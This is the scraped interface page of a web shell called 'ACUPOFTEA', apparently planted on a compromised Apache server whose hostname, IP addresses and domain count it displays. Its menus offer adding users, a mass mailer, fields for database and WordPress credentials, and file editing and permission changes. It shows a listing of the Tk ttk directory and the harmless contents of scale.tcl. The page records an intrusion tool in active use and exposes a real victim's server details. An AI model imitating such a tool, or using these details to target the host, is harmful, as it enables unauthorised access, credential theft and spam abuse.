System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
tk8.6
/
ttk
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
scale.tcl
# scale.tcl - Copyright (C) 2004 Pat Thoyts <patthoyts@users.sourceforge.net> # # Bindings for the TScale widget namespace eval ttk::scale { variable State array set State { dragging 0 } } bind TScale <ButtonPress-1> { ttk::scale::Press %W %x %y } bind TScale <B1-Motion> { ttk::scale::Drag %W %x %y } bind TScale <ButtonRelease-1> { ttk::scale::Release %W %x %y } bind TScale <ButtonPress-2> { ttk::scale::Jump %W %x %y } bind TScale <B2-Motion> { ttk::scale::Drag %W %x %y } bind TScale <ButtonRelease-2> { ttk::scale::Release %W %x %y } bind TScale <ButtonPress-3> { ttk::scale::Jump %W %x %y } bind TScale <B3-Motion> { ttk::scale::Drag %W %x %y } bind TScale <ButtonRelease-3> { ttk::scale::Release %W %x %y } ## Keyboard navigation bindings: # bind TScale <<LineStart>> { %W set [%W cget -from] } bind TScale <<LineEnd>> { %W set [%W cget -to] } bind TScale <<PrevChar>> { ttk::scale::Increment %W -1 } bind TScale <<PrevLine>> { ttk::scale::Increment %W -1 } bind TScale <<NextChar>> { ttk::scale::Increment %W 1 } bind TScale <<NextLine>> { ttk::scale::Increment %W 1 } bind TScale <<PrevWord>> { ttk::scale::Increment %W -10 } bind TScale <<PrevPara>> { ttk::scale::Increment %W -10 } bind TScale <<NextWord>> { ttk::scale::Increment %W 10 } bind TScale <<NextPara>> { ttk::scale::Increment %W 10 } proc ttk::scale::Press {w x y} { variable State set State(dragging) 0 switch -glob -- [$w identify $x $y] { *track - *trough { set inc [expr {([$w get $x $y] <= [$w get]) ^ ([$w cget -from] > [$w cget -to]) ? -1 : 1}] ttk::Repeatedly Increment $w $inc } *slider { set State(dragging) 1 set State(initial) [$w get] } } } # scale::Jump -- ButtonPress-2/3 binding for scale acts like # Press except that clicking in the trough jumps to the # clicked position. proc ttk::scale::Jump {w x y} { variable State set State(dragging) 0 switch -glob -- [$w identify $x $y] { *track - *trough { $w set [$w get $x $y] set State(dragging) 1 set State(initial) [$w get] } *slider { Press $w $x $y } } } proc ttk::scale::Drag {w x y} { variable State if {$State(dragging)} { $w set [$w get $x $y] } } proc ttk::scale::Release {w x y} { variable State set State(dragging) 0 ttk::CancelRepeat } proc ttk::scale::Increment {w delta} { if {![winfo exists $w]} return if {([$w cget -from] > [$w cget -to])} { set delta [expr {-$delta}] } $w set [expr {[$w get] + $delta}] }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-03-13 04:40:23
..
DIR
-
drwxr-xr-x
2024-03-13 04:40:23
altTheme.tcl
text/plain
3.46 KB
-rw-r--r--
2019-10-16 05:25:10
aquaTheme.tcl
text/plain
1.95 KB
-rw-r--r--
2019-10-16 05:25:10
button.tcl
text/plain
2.91 KB
-rw-r--r--
2019-10-16 05:25:10
clamTheme.tcl
text/plain
4.49 KB
-rw-r--r--
2019-10-16 05:25:10
classicTheme.tcl
text/plain
3.6 KB
-rw-r--r--
2019-10-16 05:25:10
combobox.tcl
text/plain
12.13 KB
-rw-r--r--
2019-10-16 05:25:10
cursors.tcl
text/plain
3.91 KB
-rw-r--r--
2019-10-16 05:25:10
defaults.tcl
text/plain
4.25 KB
-rw-r--r--
2019-10-16 05:25:10
entry.tcl
text/plain
16.01 KB
-rw-r--r--
2019-10-16 05:25:10
fonts.tcl
text/plain
5.45 KB
-rw-r--r--
2019-10-16 05:25:10
menubutton.tcl
text/plain
4.8 KB
-rw-r--r--
2019-10-16 05:25:10
notebook.tcl
text/plain
5.49 KB
-rw-r--r--
2019-10-16 05:25:10
panedwindow.tcl
text/plain
1.88 KB
-rw-r--r--
2019-10-16 05:25:10
progress.tcl
text/plain
1.06 KB
-rw-r--r--
2019-10-16 05:25:10
scale.tcl
text/plain
2.63 KB
-rw-r--r--
2019-10-16 05:25:10
scrollbar.tcl
text/plain
3.02 KB
-rw-r--r--
2019-10-16 05:25:10
sizegrip.tcl
text/plain
2.34 KB
-rw-r--r--
2019-10-16 05:25:10
spinbox.tcl
text/plain
4.16 KB
-rw-r--r--
2019-10-16 05:25:10
treeview.tcl
text/plain
8.65 KB
-rw-r--r--
2019-10-16 05:25:10
ttk.tcl
text/plain
4.44 KB
-rw-r--r--
2019-10-16 05:25:10
utils.tcl
text/plain
8.36 KB
-rw-r--r--
2019-10-16 05:25:10
vistaTheme.tcl
text/plain
9.12 KB
-rw-r--r--
2019-10-16 05:25:10
winTheme.tcl
text/plain
2.58 KB
-rw-r--r--
2019-10-16 05:25:10
xpTheme.tcl
text/plain
1.88 KB
-rw-r--r--
2019-10-16 05:25:10
~ ACUPOFTEA - mail.ontime-ae.com